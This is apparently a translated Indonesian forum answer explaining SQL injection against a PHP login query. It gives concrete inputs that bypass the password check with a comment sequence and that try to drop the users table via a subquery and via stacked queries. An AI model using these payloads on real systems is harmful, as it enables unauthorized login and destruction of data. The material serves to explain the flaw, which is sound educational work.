Sesuatu seperti ini harus dilakukan:
- Untuk masuk sebagai pengguna "foo", setel nama pengguna menjadi "foo' -- "
Ini akan membuat kueri Anda terlihat seperti
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
Tanda "-- " berarti sisa baris dikomentari
- Tidak yakin apakah ini akan berhasil, tetapi coba setel nama pengguna ke "foo' OR (pengguna DROP TABLE) -- "
Ini akan membuat kueri Anda terlihat seperti:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
mungkin tidak menerimanya - saya pikir subkueri hanya dapat PILIH.
Fungsi mysql_query hanya akan menjalankan satu kueri - yang lain mengizinkan Anda melakukan ini:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
